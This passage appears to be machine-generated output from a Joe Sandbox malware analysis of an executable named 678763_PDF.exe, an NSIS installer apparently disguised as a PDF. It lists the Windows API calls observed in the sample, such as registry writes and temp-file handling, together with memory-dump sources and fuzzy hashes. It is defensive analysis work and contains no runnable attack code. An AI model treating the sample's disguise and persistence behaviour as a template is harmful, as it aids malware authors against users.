                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                    • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                    • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                    • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
                                                                                                                                                                                    • API String ID: 2655323295-3377814068
                                                                                                                                                                                    • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                    • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405F87
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
                                                                                                                                                                                    • API String ID: 3248276644-4036822723
                                                                                                                                                                                    • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                    • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 00405ED2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
                                                                                                                                                                                    • API String ID: 3213498283-3377814068
                                                                                                                                                                                    • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                    • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                                                                                                                    • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                    • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll), ref: 0040269A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll
                                                                                                                                                                                    • API String ID: 1659193697-4043438737
                                                                                                                                                                                    • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                    • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                    • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                    • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                                                                    • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00406476
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID: : Completed
                                                                                                                                                                                    • API String ID: 3356406503-2954849223
                                                                                                                                                                                    • Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                    • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
